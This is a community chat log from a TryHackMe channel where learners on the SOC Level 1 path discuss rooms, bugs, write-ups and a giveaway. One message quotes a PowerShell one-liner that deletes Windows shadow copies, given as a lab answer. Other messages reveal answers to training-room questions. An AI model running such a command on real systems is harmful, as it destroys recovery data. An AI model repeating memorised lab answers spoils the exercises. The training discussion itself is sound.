#soc-level-1-path
@native viper any idea if much has changed?
Thanks for the answer
Gave +1 Rep to @native viper (current: #928 - 7)
A whole lotta stuff was changed and it's cool! It focuses on pure SOC activities now rather than the old rooms explaining tools you might never touch as a SOC analyst.
Nice to hear
Is the "Cold Start" event already on?
https://www.linkedin.com/posts/tryhackme_the-cold-start-1-day-to-go-activity-7416170043815657472-DMAM/
I cannot find it
Hello, I have a question. If I start SOC Level 1, am I automatically entered in the giveaway, or do I need to finish the whole course? (I really want that free SAL1 exam pass)
Nvm, I'm dumb, it's 1 ticket per room again.
hmm page not found
Can anyone help me figure out why xxx.xxx.xxx.103 is here the answer
I would say .104 should be the answer
Chips, here are tickets for rooms I already did
@dull swallow must I do the rooms again for the tickets on rooms that I have already done?
try this:
oke, thanks
Frustrating subject this way.
@eternal moon did you also find the Wireshark challenges very hard, or is it just me?
Well... they are specific in some way, challenging I would say.
for sure challenging
It causes me a real headache after 1 - 2 hours of work with Wireshark.
Well, I've already encountered much worse rooms, but if you do a few Wireshark rooms it will be easier.
Okay, which did you find one of the worst rooms then?
Try HoloLive
is this a SOC challenge ??
If you haven't seen the announcement, check it out here - #announcements message
Okay, so I need to do some challenges again to earn the certificates? @proper meteor @dull swallow
Yep, looks like you do according to this slide
Then I do not know if this challenge is for me
I'm still busy with some chapters of this level and I'm around 45 - 50%.
There's time until end of day 25th January UK time, you can do it. Also you don't have to redo everything, only some of the rooms give you tickets
Rooms have a ticket next to it in the SOC Level 1 path
Highly recommend to anybody currently in the SOCL1 path! https://discord.com/channels/521382216299839518/1460315980428214303
maybe a stupid question
But I'm studying in 2 different places.
Could GitHub be a good place for my notes, or is there a better place?
Obsidian works great as note-taking software
It offers plenty of possibilities and customizations
Okay, then I have to install it in 2 places?
That will be a problem because I cannot install software on my work computer
Hey, my apologies for the late response, but tcp.window is for setting how much data can be transmitted in a data packet before being acknowledged.
You can use a web-based note-taking app like https://app.notesnook.com/notes/ which you can access through a web browser. No software installation needed.
There are various payment plans, so choose a plan according to your needs.
Try out Notion. Great web app, and you can download the desktop app at home.
Thanks everyone
I will take a look
In the SOC Roles in Blue Team room, during task 5 "Final challenge", you have that website task to put good people in good spots. But it literally shows you the good answer by colouring in red or green when you grab someone and hover over an answer. Is that intended?
Do i understand correctly that finished rooms don't count for tickets? I have to reset and retake them to earn the credits?
Yeah that's what rules says
In SOC Level 1, SOC Team Internals, SOC Metrics and Objectives, they covered terms such as MTTD, MTTA, MTTR:
Imagine a scenario where an employee was lured into running data stealer malware.
The SOC team received the "Connection to Redline Stealer C2" alert after 12 minutes.
One of the L1 analysts on shift moved the alert to In Progress 10 minutes later.
After 6 minutes, the alert was escalated to L2, who spent 35 minutes cleaning the malware.
Provide the MTTD, MTTA, and MTTR via comma as your answer (e.g. 10,20,30).
My answer was: 12,10,41
My thought process:
SOC received the alert 12 minutes after the malware started running, which means MTTD = 12.
L1 analyst moves the alert to In Progress after 10 minutes: MTTA = 10.
L1 analyst then takes 6 minutes to escalate the alert to L2, which becomes an internal process.
L2 analyst then takes 35 minutes clearing the malware: MTTR = 6 + 35 = 41.
Final answer (MTTD,MTTA,MTTR) = 12,10,41
ANSWER IS INCORRECT?
How? And what's the answer?
Question to those who completed the IP and Domain Threat Intel room. Does the DNS check give results for you? I can't proceed in the room without checking write-ups. Although the method is the same as the one I use, I can't get any result.
(MTTD,MTTA,MTTR) = 12,10,41
Check again what these metrics correspond to; MTTR is not only 41 minutes, for example.
Had the same issue, just followed a guide
Did the same although knew the methodology
thanks though
Someone in SOC from the UK, guys?
No idea, I'm from the Netherlands.
I'm getting tired of these machines getting terminated all of a sudden
Maybe try reporting at support@tryhackme.com , I have the same issue
Yeah, there is a link to the help site that pops up, but I'm just tired of it happening repeatedly.
someone soc from arg?
Was this a pretty good prep path? Did it lead to a job for anyone?
I'm just starting out, beginning with the SOC Team Internals section. It's helping me get a general overview of what a SOC analyst does. But I haven't been able to get a job yet.
Hello I seem to encounter a problem in the room: investigatingwithelk101. The "vpn_connections" logs is empty
has anyone done the soc L1 alert reporting task 4? My question 2 does not fit the flag the soc dashboard is giving me.
@twilit trout @solid nest could you share screenshots?
Don't have it open anymore :C but I found the answer in a different room. Didn't fully get why some people got that one and some of us got the one I got, which says faking Microsoft support. The other one said good job escalating alert or something along those lines.
There are like 2 or 3 flags and they are sequenced
But I'm glad you were able to get it.
What does that mean? I tried changing what I picked in the tabs just in case that changed the outcome, but it gave me the same in all combos.
The alerts in those rooms were to be taken based on severity, so the first one would be the one with the highest severity (critical) and the next would be lower (high -> medium -> low).
Yeah, that's the order I did them in. I guess it might have been because I restarted it a couple of times xD
I finished the room and just forgot to set the filter, tysm for the concern!
Guys, I have completed some rooms for SOC L1 which have the ticket. What to do in that situation? Reset the progress?
Reset the progress of only those rooms which display a picture of a ticket.
Is there a problem with the site.
When I try to open the roadmap I get a message that the page cannot be loaded
What is wrong with this Snort rule:
alert tcp any any <> any any (msg:"PUSH ACK"; flags:P;sid:1000001;rev:1;)
to find the answer to this question
Clear the previous alert file and comment out the old rules. Write a rule to filter packets with Push-Ack flags and run it against the given pcap file. What is the number of detected packets?
Hey guys, can I start directly with SOC L1 with some knowledge of networking, Linux and Windows?
I would not do it
For anyone still doing SOC Metrics and Objectives, make sure you look at the diagram they provide; it shows you how to calculate the numbers. I spent way too long before I realised it was right in front of me.
I'll echo @vocal mesa. I'd recommend learning some more fundamentals first, but you don't NEED to. I started my own cyber career journey about a year and a half ago. There are a lot of fundamentals that will help you immensely. I did have 15 years of network and tech hobby, but it still took me about a year to reach the level of knowledge (and recall, for that matter too) where I feel I can constantly move room to room without getting stuck. Fundamentals are the backbone of anything cyber and they are transferable skills.
But that can be not much fun, so here is something I learned when I started: if the topic you are curious about is complex, check the intro to that room; they often say what prerequisites are required. Just brush up on those rooms and have them ready to reference, along with forums, AI (Echo included), and the community tutorials (YouTube has a ton). If you get stuck, follow along. I am someone who prefers to get in over my head and then figure it out the hard way.
If you are tech savvy you could attempt the SOC L1 Cold Start; no penalty for trying, and you may get further than you think. A lot of it is tutorial to start with (although those kinda expect you to know a bit of the basics).
To be very clear, I'm talking about Cold Start and not the certification. I do not recommend jumping right into that without some good background.
whats this about now?
Hi guys,
New here. I've been learning SOC for the last 6 months but have made progress in the last month. Looking forward to getting experience and learnings from you all!
If somebody has already completed a room in SOC L1 path, they need to reset the room and complete it again to gain a ticket for raffle.
bummer
mid path or only prior to this competition?
I have a verify/display issue with my SOC Level 1 Certificate. I completed the Legacy SOC Level 1 path on August 29 (89 hours). I recently completed the New SOC Level 1 path yesterday (65 hours). However, when I download my certificate for the new path, it is still generating the certificate with the old date (Aug 29) and the old hour count (89 hours). In which channel should I post this problem?
a question about the windows logging rooms
How can I do the search step in Event Viewer:
Analyse Process Activities (Expand Me)
Copy the ProcessId field from the event ID 1
Search for other Sysmon events with the same ProcessId
I'm talking about this room:
Hello, I was doing the Wireshark room and was stuck on the Decrypt the traffic question. I have added the KeylogsFile.txt in the Wireshark TLS protocol settings, and when I am searching for http2 packets, I don't see any on the screen.
- Tried Reloading The pcap file
- Tried Reopening Wireshark
- Tried Restarting Attackbox
Add the keys to the last field "(Pre)-Master-Secret log filename"
oh shoot! my bad
Someone who can help me with my problem ??
yeah?
Sorry buddy! I am not there yet.
totally not a problem
I was actually doing the SOC L1 path, but it got revamped after. So I am doing multiple new rooms rn.
Okay, and my room is about 60%
Try hard yourself first. Then ask somebody, then check the writeup. Easy.
But as I said, totally not a problem that you cannot help me.
This was more for everyone instead of just you
Or watch a YT video. I am sure there will be someone who was explaining these topics alongside completing the room.
I already looked at some writeups but they gave an answer, not how they found the answer.
And that for me is the most important part.
Search for a YT video of this room then.
Or ask any AI model.
You can use the 'find' button in Event Viewer
It's on the right menu, under the filter current log and properties
Yeah, that will work
You mean target box?
AttackBoxes are terrible when it comes to performance, better to virtualise your own
Why is that?
Some things are, in my opinion, in a weird place.
You can always customise it; long-term you will benefit from using Kali or some other distro in general.
Okay
For now I have to think how to solve this one:
What is the Command & Control server malware connected to?
(Answer in format IP:Port, e.g. 1.1.1.1:80)
With Find you can now do it easily, good luck
And Windows logging done.
Tomorrow time for Windows Threat Detection 1
The team had been building this CTF for a while and now we're delighted to be able to release it. A pure blue CTF focused on the skills learned in the SOC L1 path. Play for prizes or play for fun, I hope you enjoy the challenge!
@proper meteor is this challenge also doable when you are still busy and are on the first part (25%)?
The Windows Security Monitoring room is so extraordinary! Thank you TryHackMe!
Hey @vocal mesa, the topics will cover multiple modules across the whole path, so if you have no knowledge on some topics yet it may be a challenge. However, the team did try to build this so there are layers of difficulty, so there would be something for everyone. Up to you, but nothing really to lose by giving it a go; should be some good learnings in it. Win or learn!
Your last remark reminds me of a remark at the sports school my wife is going to:
you never lose. Either you win or you learn.
Love it
@fast prairie deserves all the credit for this module, it's a great one
no idea if I already did that one
I'm still at the Windows Threat Detection 2 room
@proper meteor maybe a new career in security at 60
Great work @fast prairie
Good night guys, can anyone tell me if there are some bugs in the first level of the site?
I'm trying to move forward to the third task of the introduction.
It's talking about DirBuster, about the second hidden URL; I'm answering right, and it's not working.
After some time, I finally completed it. Thank you!!
Hello I would like to report an error in room https://tryhackme.com/room/wiresharktrafficanalysis
ARP Poisoning & Man In The Middle! question 3. I don't find the same number requested; it's still 1 digit but I don't have the same number within the same pcap. If I am wrong, can someone explain my error to me?
NEVERMIND, I just understood it when checking the packets.
My bad
Hello everyone, I want to practice SOC events and documenting them for Interviews.
Does someone know the best way to do it?
Hello, in the room https://tryhackme.com/room/fileandhashthreatintel, task 4. There's a question "Which other process was spawned according to the process tree?"
I couldn't find anything that would be correct either on VirusTotal or Hybrid-Analysis, so I checked a walkthrough. Can someone help me understand where the answer ||werfault.exe|| for the file with SHA256 ||2672B6688D7B32A90F9153D2FF607D6801E6CBDE61F509ED36D0450745998D58|| is coming from? I'm completely lost. Even tried to Ctrl+F this file on both sites and I couldn't find anything.
Hmm, I guess it's just a bit outdated; spotted two more weird answers.
I'll pass that on to the team to see if we can figure this out. I know this room in the past had some issues where the threat intelligence sites that were used updated the reports, and so some questions broke.
Thx
Gave +1 Rep to @proper meteor (current: #253 - 40)
You mentioned there are two other questions that had weird answers also. Are they all in the same task? (task 4)
Same room, but I think it was the task afterwards. I can give you more details in around 2h.
Same room, task 5:
What PowerShell script is observed to be executed?
The correct answer is:
||Get-WmiObject Win32_Shadowcopy | Remove-WmiObject||
However this is misleading, as it's not a script; it's a cmdlet, or rather a one-liner.
What is the MITRE ATT&CK ID associated with this execution?
And the correct answer: ||T1490||
Shouldn't it be ||T1059||? Win32_Shadowcopy might be related to the correct answer but the question is about PowerShell execution (?)
You're right about the PowerShell script question; it would be more accurate to rephrase it as a command.
For the second part, the question targets the actions associated with the command, not PowerShell, which is why the latter wasn't set as the correct answer. The questions shall be rephrased to avoid ambiguity. Thanks for the feedback
Gave +1 Rep to @fickle flare (current: #466 - 17)
Hello, in the room https://tryhackme.com/room/investigatingwithelk101, task 5, there is a question "Create a search query to filter the logs where Source_Country is the United States and show logs from User James or Albert. How many records were returned?"
The result I got is 101, and it says it's wrong.
This is what I wrote, is there anything wrong with it?
Source_Country : "United States" and ("Albert" or "james" )
I solved it, it came out to 161. The problem was that there were two employees named James, one with a capital J and the other with a lowercase J.
In soc jobs or internships, which is more common remote work or offline work?
Hi, maybe it's a stupid question, but I'm a bit surprised with the Introduction to Phishing SOC Simulation scenario positioned at the end of the SOC Team Internals chapter of the SOC L1 path. This simulation scenario info says it takes only around 10 min to finish it, but when I'm looking at the playbook it seems that it would take me much, much more time at the level where I am at in the SOC L1 path. Splunk and other techniques that I need to use are only learned in the subsequent chapters. So my question is: am I missing something? Overthinking this simulation? Or did you guys keep going with the rest of the learning path chapter by chapter and then only at the end work on the SOC simulation scenario?
hi Quick question
I've been building a home lab using two laptops, and even though things are running, I'm feeling a bit lost about what I should do next to properly learn and progress as a SOC analyst, so I wanted to ask if there's anything that can guide me on what to focus on now, what skills or scenarios to practice, and how to move forward from here.
https://x.com/SBE10OC/status/2010367164121850174
Appreciate any advice
Hey, I don't know if this is the right area in the Discord to ask this; I'm quite new to this platform. I've recently been going through the SOC Level 1 path on TryHackMe and I've come to the Snapped Phish-ing Line room challenge. Prior to reaching this room, the material I was reading felt like it was sinking in and making sense, and when I got to this room, part of me is feeling like, did I even come across this before? Are there more things I should be doing prior to these types of rooms that are challenges? Did any of you feel the same way? Apologies for the long message, but any help would be appreciated.
whats this?
With the Linux Threat Detection room task 5, how do I find this answer?
Which command did the attacker use to list the last logged-in users?
You could try
sudo systemctl status auditd
&
sudo ausearch -x /bin/bash
sudo aureport -x
If that doesn't work you could try this.
journalctl
journalctl _UID=1000
journalctl -u ssh
Not done this room myself so not entirely sure if this will get you the answer, but fingers crossed
thanks
You can view this as your first experience working in a SOC: alerts coming in, SIEM investigations. Maybe you don't have all the information you need to close the alerts. It's less important that you nail this and find it easy; it's more important that this stretches you and maybe opens your eyes a little bit in terms of what's needed over the coming modules. You don't need to pass it successfully to move on to the next module. Just view it as an experience. Do your best.
This is a very individual question; it depends on where you are starting out. There are lots of core concepts and understandings to learn that you can learn without a home lab. I'm saying this, but I'm a really big fan of people having some type of home lab that they can set up, break, test (learnt a huge amount myself that way).
If however you don't yet know what you want to build, then probably the focus should be on structured learning like our SOC Level 1 path. There may be a time going through this that you think you want to dig deeper on a certain concept that you can't do in the room or VM provided; then that would be a great first thing to build.
That is part of a ticketing event that has been run on the platform for the SOC L1 path; I think it's over now or nearly over. Maybe your one ticket wins a prize!
Thank you for your reply. It makes sense now.
Gave +1 Rep to @proper meteor (current: #251 - 41)
Hello, do the SOC simulator rooms that require THM Business count for path completion?
Hey guys, I'm currently making write-ups for some of the rooms in the SOC1 path so I can put them on my portfolio to send to employers, but I'm struggling with a format for the SOC simulators. It seems like any way I do this there's a lot of bloat in the way of screenshots or alert repetition, and I was wondering if anyone had any ideas?
I am not sure if there's a problem with this room for the SOC1 path but looking at writeups and comparing the answers to what I am actually seeing in the room doesn't look right.
Not sure if I am doing anything wrong or if there's a problem here that is beyond my scope.
https://tryhackme.com/room/ipanddomainthreatintel
The question
What is the country's name for the same IP address (64[.]31[.]63[.]194)?
Writeup says France but when I look at the IP lookup page, it only shows me the USA address so not sure what to do here.
I did this yesterday and France is the correct answer. Make sure you actually provide the IP address in the correct format (without defanging).
Thanks I already figured that out and should have trusted my own instincts to do my own research
Gave +1 Rep to @fickle flare (current: #410 - 20)
Question to https://tryhackme.com/room/ipanddomainthreatintel
Isn't the question from task 7 outdated? Wherever I searched, the date is 16/01/2026.
We are looking to update the task, as this is a case of the tools updating the data. I apologize for any frustration
Not frustrated at all, thank you for the swift answer.
Gave +1 Rep to @hushed goblet (current: #285 - 36)
Hey all, did anyone do the recent CTF we ran last weekend first-shift-ctf?
Just looking for some input from you all. The CTF was built based on the topics within the SOC Level 1 path. We're considering if we should reuse the challenges and add them to the existing path for learning: either break it up into individual rooms and include it in a module, maybe right at the end, or distribute it throughout the path as challenges you face along the way.
We're a little concerned that might make the path too long by putting these additional challenges in it, because it already has capstone challenges.
Anyone have any strong opinions either way?
I haven't tried that CTF. But I would be super glad if we can have more CTFs in the rooms as a learning process. While some may care more about speed of completing the module, I do care more about the knowledge gained (these are things that will give us advantages while trying to get a job)
Add challenges to any learning path as and when you all feel it will be good practice.
Also remove challenges you all feel are no longer relevant or good enough.
Why is the Blackcat room included in the SOC path if it's not accessible with a premium account? Seems to be a business account only feature. Am I missing something? For context, it's the last room in the Linux Security Monitoring section.
You are not missing anything. Unfortunately the business rooms are included in the regular paths.
Bummer, what a tease. Thanks for validating tho!
Gave +1 Rep to @fickle flare (current: #397 - 21)
Anyone available to mentor/guide me briefly on SOC career steps and resume improvements? I'd really appreciate feedback.
https://github.com/Sp41zyyxx/Write-Up-SOC1/blob/main/Boogeyman 1 BOOGEYMAN 1 SOC1 WRITEUP
Just finished the whole SOC Level 1 path. It was fun! I enjoyed the challenges the most, Boogeyman was great
I'm 96% done with my SOC 1 course and I want to ask a question.
Are "Hidden Hook" and "Open Door" paid rooms?
Do I need to pay extra to access those rooms, or are they included in the monthly subscription?
anyone ?
Congrats!! There were a few challenges that required a business sub. Does that affect the path completion?
No, they do not affect it.
@atomic pendant they are extra paid for business users
Thanks!
MY WRITEUPS IF ANYONE NEEDS THEM
https://github.com/Sp41zyyxx/Write-Up-SOC1/blob/main/Boogeyman 1 BOOGEYMAN 1 SOC1 WRITEUP
https://github.com/Sp41zyyxx/Write-Up-SOC1/blob/main/Boogeyman2 BOOGEYMAN 2 SOC1 WRITEUP
Hii
Imo it's lacking an explanation of how you got to the answers.
I don't find such writeups useful for myself.
Fair point, the writeup focuses more on the investigation steps than the reasoning behind them.
I'm working on adding more context to explain why each technique was used.
If you need any assistance, please do not hesitate to contact me.
Can someone help me out with this question: "What is the website for the - CLICK HERE URL in a defanged format? (e.g. https://website.thm)" I've exhausted all resources, followed all steps, even got the right answer, but it seems the question is broken. https://tryhackme.com/room/phishingemails1tryoe
did you defang the URL?
Yes, in CyberChef and CMD.
In CyberChef with "From Base64" and | base64 in CMD... I can show you the answers I got; both formats, neither works.
Why Base64 and CMD? You just have to provide the defanged domain.
That's all you need to do.
echo" This will output the Base64 encoded version of the URL. You can then use this encoded string in your CyberChef recipe. If you want to decode it back, you can use the From Base64 operation in CyberChef.
If you need further assistance with this process or have any other questions, feel free to ask!
aHR0cHM6Ly90LnRlY2tiZS5jb20= I input this with the command and the answer that came back was https://t.teckbe.com
Great! You've successfully decoded the Base64 string aHR0cHM6Ly90LnRlY2tiZS5jb20= to get the URL https://t.teckbe.com. This URL appears to be the one associated with the 'CLICK HERE' link you were analyzing. If you need to include it in your report or responses, you can use the defanged format as hxxps://t[.]teckbe[.]com to avoid accidental clicks. Let me know if you need help with anything else related to your task or further analysis!"
Echo... is shit. Although it provided you the correct answer at the bottom.
And it's the same answer I got on my own that still doesn't work.
Ah, yea, it's missing some part. Just take that URL and put it into CyberChef as on the screenshot.
hxxps://t[.]teckbe[.]com doesn't fit, marks as wrong.
Because it's not correct. Have you set the recipe as on the screenshot? It's a default setup.
I have. I'd post screenshots if I could to show you. Then maybe I could know what I'm doing wrong.
Verify your account #start-here , then you will be able to post screenshots
Really appreciate the help. I know it has to be user error this just stumped me
Now you need to add another recipe there: Defang URL
saw your SS thank you
Gave +1 Rep to @fickle flare (current: #386 - 22)
You couldn't see the screenshot without verification?
I could, but I thought defang and decode were the same, so I zoomed in and saw defang.
Ahh okay, gj
Got it man, thank you
hxxp[://]t[.]teckbe[.]com
Hello,
I'm experiencing an issue with Task 4, Question 2, where the platform does not appear to register or provide the correct flag after completing the task.
I have followed the required steps carefully and confirmed that the alert escalation and triage were completed correctly. However, the flag does not validate or update as expected.
To troubleshoot, I have already tried the following:
- Restarted the browser
- Tested using a different browser
- Logged out and logged back in
- Restarted the room/session where applicable
Despite these steps, the issue persists and no new or valid flag is generated for this task.
Could you please advise if this is a known issue or if there is an additional step I may be missing?
Which room?
SOC L1 Alert Reporting
Have you read and tried what is in the note?
Note: If you correctly escalated the alert earlier, just edit the alert and click "Save" again.
Yeah, did that. Not sure; can't share a picture either.
You need to escalate the alert to L2, then edit the alert and save it
if you want to share screenshots you need to verify your account, it's described in #start-here
Anyone here done the Tempest room? Today for some reason, I started it the first time and it is frozen. So I ended the instance and restarted it, still the same thing. Is it me or is there a problem with the machine? Yesterday it was working fine, albeit disconnecting every 20 minutes or so.
I tried the RDP option and it was not letting me log in due to permissions not allowing me to do so...
@dull swallow
Hi team, I am unable to share a screenshot even after verifying the account. Could anyone help, please?
You should RDP from your VM (like Kali) into the Windows box, not from the split screen. It looks like you are trying to access the same machine.
You can also try opening the target box in full screen
Your account is not verified
No I tried to RDP from my windows machine using openvpn
Ok. It doesn't work from my Windows with OpenVPN either, probably has to do something with OpenVPN client configuration or firewall. From Kali it works without any issue.
EDIT: Nvm, it works. Give it more time to boot?
Yeah but I assume you wanted to ping @vague cave
oh, right. my bad.
Yes I am
Can anybody help me with this question please.. What are the file's contents in C:\Treasure\Hunt?
It's from the Windows Command Line room, task 4
The section describes which commands list and display file content.
http://github.com/Sp41zyyxx/Write-Up-SOC1/tree/main/SOC1 Capstone Challenges WRITEUP
Tempest
Boogeyman 1,2,3
Hi everyone! Having trouble on this path on "SIEM Triage for SOC" on "Log Analysis for SIEM" , the setup your virtual environment and start button do not work. Anyone had the same issue?
Hi @undone citrus, it is a new bug that was just reported to the product team. The fix should be available soon, and you will be able to launch the room as usual. Sorry for the inconvenience
Oh, thank you for the quick response! That's god tier support right there
Should work fine now
hey @fast prairie you're amazing! love your rooms and content!!
Hey, could I ask what is going on with the Phishing Emails room? Tasks are not well explained and some questions and answers are just stupid. Worst made room after OWASP so far for me.
Anyone who can help me solve this:
3, 4, 2, 1... You first detect the abnormal user agent -> then you identify the suspected attacker IP -> then you go ahead to check the domain it's contacting -> then you get the full C2 URL.
you're welcome!
I was all the time thinking and stuck on
first the IP, then the user agent, then the domain and then the full URL
Recap done
If you're working with thousands of logs, the odd user agent will stand out and help you triage faster.
Okay, still a lot to learn and practise before I can become a good hobby analyst.
Good morning bros and ladies.... Can anybody help me with a question? I've been stuck on this question for 3 days now.
Hey, how did you post the screenshot? Because I took a snapshot and it's not letting me upload my question.
Did you register on tryhackme on your profile ? @half raptor
Yeah, from the website or on the Discord? But on the website, yes I did.
So on your account details you have a Discord token?
What does it look like?
a lot of numbers and characters mixed
Can a @mod or @staff take over this question ?
yeap??
Okay, it's the Windows Command Line room and it's task 4.
Yeah, I've been having trouble finding it.
First step: cd C:\Treasure\Hunt
Second step: dir
Third step: type flag.txt
THM{*****}
If you have any questions, please let me know.
Okay will do
Were you able to?
I'm gonna jump on it once I get out of this meeting & I'll let you know.
Hey there! I'm having trouble determining if someone clicked on a phishing link or not in a SIEM (Splunk). I've watched many videos/tutorials but I can't seem to grasp THAT part. Could anyone explain?
You can search for HTTP requests (GET) using timestamps, user agents, and host names.
Hi, I am new here. I just met a crazy question after reading logs; the question was: a friend that leaves evidence on a table is what? The answer is a five letter word. Kindly help.
Room? Task?
yes please
SOC level 1
yes sir
The question is under Introduction to Logs, and the question is: what is the name of your colleague who left a note on your desk?
@teal steeple talks about https://tryhackme.com/room/introtologs
Perfect
Click on your profile -> Manage Accounts -> Account details. Scroll down on account details and you'll find your token. Then copy your token and come back here. Type /verify and choose the verify bot, then it'll prompt for your token so you paste it. Then you'll be able to paste screenshots and other stuff.
Hi everybody. Please be aware that the link to the Introduction to EDR room is not working. Here is the link in question: https://tryhackme.com/room/introductiontoedr . It only shows a blank page with the error: 'If this is an error on our behalf please contact us.'
try this one
Thanks. That one with the 's' at the end is working properly. Please, fix the link in the Linux Logging for SOC room (audit alternatives). The word EDRs in blue.
Gave +1 Rep to @fickle flare (current: #362 - 24)
@fast prairie
If anyone has any questions, please let me know
Hey @hasty gazelle @fickle flare, fixed, thank you!
Gave +1 Rep to @hasty gazelle (current: #1773 - 3)
Gave +1 Rep to @fickle flare (current: #357 - 25)
As a core user, THM emailed me about my experience. In all honesty, you have started a great methodology to help garner new students to IT. The Pre-Security and Cyber 101 courses are quite a good introduction. SOC1 (90% through) tends to jump all over the place. The introduction of so many techniques could baffle most users, and the use of a "league system" will just produce more analysts that have no idea what they are doing when it comes to an interview. I understand the need to make money to keep this platform alive, but your challenge and league, carrot and stick learning approach will just create more undereducated people that have no chance in real-world institutions.
Eradication & Remediation WRITEUP
https://github.com/Sp41zyyxx/Write-Up-SOC1/blob/main/Modules/Incident Response/4. Eradication %26 Remediation.md
Hey sorry for the late response but I figured it out and I appreciate the help truly.
Well, that's good news. Let me know if you need anything
Yes sirrr
Appreciate all the feedback. I'm happy to take what's for me and my team and pass on what's for other teams.
- "SOC1 (90% through) tends to jump all over the place" - would you be able to share a little bit more on what you'd have preferred? Would you be happier with maybe a much longer path and spend a much slower time progressing through concepts? There's a lot of skills required for an L1 in a SOC and the path attempts to prepare people for that, but it seems the pace of movement between subjects is too fast?
- "league system" / "challenge and league, carrot and stick learning approach will just create more undereducated" - if you could maybe explain a little bit more about what you'd prefer or don't like about this, I can pass it on to the right people. Motivating people to want to come back and learn seems like a good idea in theory, but is your stance that this doesn't help people prepare for the real world?
Hey guys, how do I access recap topics? I have seen an additional room there but I can't start it for some reason; I have completed all the previous rooms of it.
I could successfully access one of mine through the bell icon, top of screen. Maybe yours are still in the history shown there. Otherwise I was asking myself the same question and thought that it would require resetting one of the involved room to trigger the recap but I did have time to test my theory.
Oh, I see, but I don't have any new notification because I had completed these rooms previously when this feature was not added.
Hello, I need a mod because I have a bug in the File and Hash Threat Intel room for task 4, 4th question, and I am pretty sure I am right. The output is "Uh-oh! The answer you provided may not be in English. Please review it and try again." And yes, the answer is not very English.
Can u send the url please?
The payroll.pdf application seems to be masquerading as which known Windows file?
this one?
yes
which is ur answer?
svchost.dll
yeap
but remember
that's a process
And what is the extension of a file with a process?
no.... exe?
You only need to change the extension.
yeah thanks
let me know if u need any more
Now I'm doing a write-up, but if u need more explanation let me know.
I would rather you think about it than give you the answer.
Hey, from talking with the team that built this, right now it works for rooms that you did after the launch of the feature but they are working on making it work for all rooms even if you did them prior to launch.
ok, thanks for informing.
Gave +1 Rep to @proper meteor (current: #243 - 44)
Write-up of the complete Incident Response module TRYHACKME
https://github.com/Sp41zyyxx/Write-Up-SOC1/tree/main/Modules/Incident Response
Can someone tell me if it's really possible to answer https://tryhackme.com/room/ipanddomainthreatintel task 7 questions 3 to 5 with the current santagift[.]shop, or is it just me?
I don't want the answer, only whether it's possible to answer, because I don't find anything matching the answer.
Looking back in my notes from last November, and how I got the answers, I would no longer have the expected results. So I do not think those questions can be solved right now.
thank you
I don't know if I can write that in the bug-report section, if someone from THM Staff can help me? For the moment I'm doing another room.
You certainly can. In my experience, some bugs reported a long while ago are still not solved; I do not know why.
I'd suggest you consult a walkthrough; no shame in that, especially if you know you have the right methodology.
That's the duality of creating OSINT rooms: teaching about real internet tools is probably the best learning experience, but OSINT data can change over time. They could create their own OSINT services in a VM/static website, but that would not be the same experience and would definitely take more dev time.
Just to check with you @lyric sentinel , and be on the same page, I'd answer those questions with ||https://www.nslookup.io/domains/santagift.shop/dns-records/|| and ||https://www.whois.com/whois/santagift.shop|| . They could update the room's answers but that would only work for a while.
Whois Lookup for santagift.shop
I just used dns history from https://completedns.com/dns-history/
So I found the right one, but yes, it changed a lot.
Yes, it's not the answer, because the valid one is ||ns-298.awsdns-37.com||
More complex, but I completed the room.
They started with a downloaded report in task 2; I wonder why they didn't do the same for the challenge.
I am curious why my machine and the AttackBox are showing different results. Is this a version issue or a profile issue?
It can differ from Wireshark version, or it might be because of wireshark profile setting.
Thanks for this link! : https://completedns.com/dns-history/
Gave +1 Rep to @lyric sentinel (current: #3651 - 1)
The last question doesn't seem to accept the answer from completedns.com and it still doesn't accept the updated one from rdap
Hi everyone,
I'm currently testing a small DFIR scenario and ran into a performance issue.
I deployed the EICAR test file on a Windows test system and then collected artifacts using the Velociraptor Offline Collector.
After that, I created a Plaso database with log2timeline and uploaded it into Timesketch. Everything is running locally on my machine.
Here's the problem:
• log2timeline took about 4 hours to complete.
• The resulting Plaso file is around 4GB.
• Indexing the file in Timesketch has already been running for more than 3 hours and is still not finished.
Is this normal behavior for a Plaso file of that size?
Does anyone know what might be causing this kind of delay?
Also, what would be a more efficient workflow in a real-world DFIR scenario? Waiting this long for timeline generation and indexing doesn't seem very practical.
Are there better approaches or alternative tools you would recommend?
Thanks in advance!
Hi everybody. I am stuck on the last question of task 6 for the room 'Linux Detection 2'. I got several IP addresses using ausearch and the file audit.log. None of them has only two digits in each component of the IP address (xx.yy.xx.y-xx.yy.xx.yy, according to the example). Has anybody got the proper reasoning to get to the answer for this one?
Hey, I finished my SOC L1 path. Do you guys think SOC L2 is worth a go? I haven't had any real SOC experience yet.
can you elaborate a bit more?
I think you should take another look and look for SSH connections.
Most of the rooms in the SOC 2 path are less than 3 years old. Only 6-7 rooms are more than 3 years old.
So, yes, you can go ahead with SOC L2 path.
It would be better if TryHackMe refreshes all the Learning paths before they are 3 years old.
And remember to take notes along the way and redo some or all the rooms until you fully grasp their contents.
Thanks. I just got some help by searching at the 'Search TryHackMe' box at the top of this chat. I am now starting the room 'Linux Detection 3'.
Gave +1 Rep to @rugged seal (current: #1451 - 4)
how long did it take you to complete?
Please, I am facing the same problem. Can you help me out or tell me the answer please? I can't get the flag.
I am in the Phishing Analysis Tools room. I want to solve phishing case 1. In general, am I not allowed to use a web browser in the AttackBox of THM? Because in the description of the task it says I should use the tools discussed in the sections before (e.g. Talos, MessageHeader etc.), but I cannot google anything.
And I solved some tasks/questions by just clicking on the given .eml file, which is not the point, I guess.
You can calculate the hash of the file and search for that on your local machine
But yeah, you are right. The provided machine doesn't have Internet access. Instructions are a bit unclear.
So it was not my fault on my end.
No.
Open the notes, you can see who's sending the message below.
Thanks
Gave +1 Rep to @quasi bough (current: #1 - 6095)
Hey, I've been doing Snapped Phish-ing Line and I have very mixed feelings about this room, like ||why is the flag hashed and reversed? You need to guess a .zip page, one question is answered in the hint because it is outdated, the tasks do not match the knowledge given in the walkthroughs before, why are there 5 mails when you only use 2, in the question "who is the recipient" you need to guess which mail to choose||
Hi Guys, New to this room. I'm stuck in the "Summit" room. The Start Machine button is grayed out. Do I need to setup a virtual machine to complete this room ?
I have the same issue in another room Alert Triage With Elastic.
Found the fix for my issue. I needed to click Join Room button which was next to the first question, instead of at the top of the page. Once clicked, the Start Machine button was activated. Issue resolved. @full berry
Thx I just did the same and it's working!
Gave +1 Rep to @real lark (current: #3665 - 1)
Does anyone also have an issue launching the Splunk web interface for the room Alert Triage with Splunk?
Never mind it worked
